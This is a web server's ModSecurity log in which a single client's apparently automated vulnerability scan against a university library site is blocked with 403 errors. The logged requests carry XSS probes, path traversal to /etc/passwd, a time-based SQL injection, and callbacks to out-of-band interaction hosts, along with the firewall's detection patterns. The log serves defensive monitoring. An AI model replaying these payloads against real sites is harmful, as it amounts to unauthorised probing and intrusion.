[Tue Aug 29 11:52:02.712167 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAhoHTMAAAAl"]
[Tue Aug 29 11:52:02.799117 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAm7nFIAAAAE"]
[Tue Aug 29 11:52:02.801871 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAni@90AAAAU"]
[Tue Aug 29 11:52:02.827228 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAnIlnAAAAAV"]
[Tue Aug 29 11:52:04.741335 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAnIlnIAAAAV"]
[Tue Aug 29 11:52:04.932837 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0pk5fc1edmknnc.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0pk5fc1edmknnc.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAnkweUAAAAY"]
[Tue Aug 29 11:52:05.543194 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAm7nFcAAAAE"]
[Tue Aug 29 11:52:06.604339 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilib.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAnTlLMAAAAA"]
[Tue Aug 29 11:52:06.611256 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAjdQaAAAAAZ"]
[Tue Aug 29 11:52:08.535074 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAnTlLcAAAAA"]
[Tue Aug 29 11:52:08.636996 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAoCWEQAAAAB"]
[Tue Aug 29 11:52:09.603912 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAnjjLsAAAAX"]
[Tue Aug 29 11:52:09.661246 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAlUlpYAAAA0"]
[Tue Aug 29 11:52:10.680567 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAoAkvIAAAAC"]
[Tue Aug 29 11:52:11.689330 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAjdQaUAAAAZ"]
[Tue Aug 29 11:52:11.708768 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAjdQaYAAAAZ"]
[Tue Aug 29 11:52:12.595814 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAn95@gAAAAD"]
[Tue Aug 29 11:52:13.541241 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAnoOpkAAAAf"]
[Tue Aug 29 11:52:13.577587 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnjjMcAAAAX"]
[Tue Aug 29 11:52:14.665503 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAn95-EAAAAD"]
[Tue Aug 29 11:52:14.666931 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAlIBksAAAAn"]
[Tue Aug 29 11:52:14.715684 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAnoOqEAAAAf"]
[Tue Aug 29 11:52:15.569117 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAnTlNgAAAAA"]
[Tue Aug 29 11:52:15.601233 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/download"] [unique_id "ZO15f8Co-f0AAAn0Gc8AAAAa"]
[Tue Aug 29 11:52:16.636185 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gMCo-f0AAAn95-cAAAAD"]
[Tue Aug 29 11:52:16.720965 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAlIBlUAAAAn"]
[Tue Aug 29 11:52:17.912884 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAoEZMcAAAAB"]
[Tue Aug 29 11:52:17.929752 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAnn2CgAAAAe"]
[Tue Aug 29 11:52:18.581845 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gsCo-f0AAAnn2CoAAAAe"]
[Tue Aug 29 11:52:19.715570 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAn400IAAAAW"]
[Tue Aug 29 11:52:20.623130 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15hMCo-f0AAAn96AkAAAAD"]
[Tue Aug 29 11:52:21.388279 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAnkwhkAAAAY"]
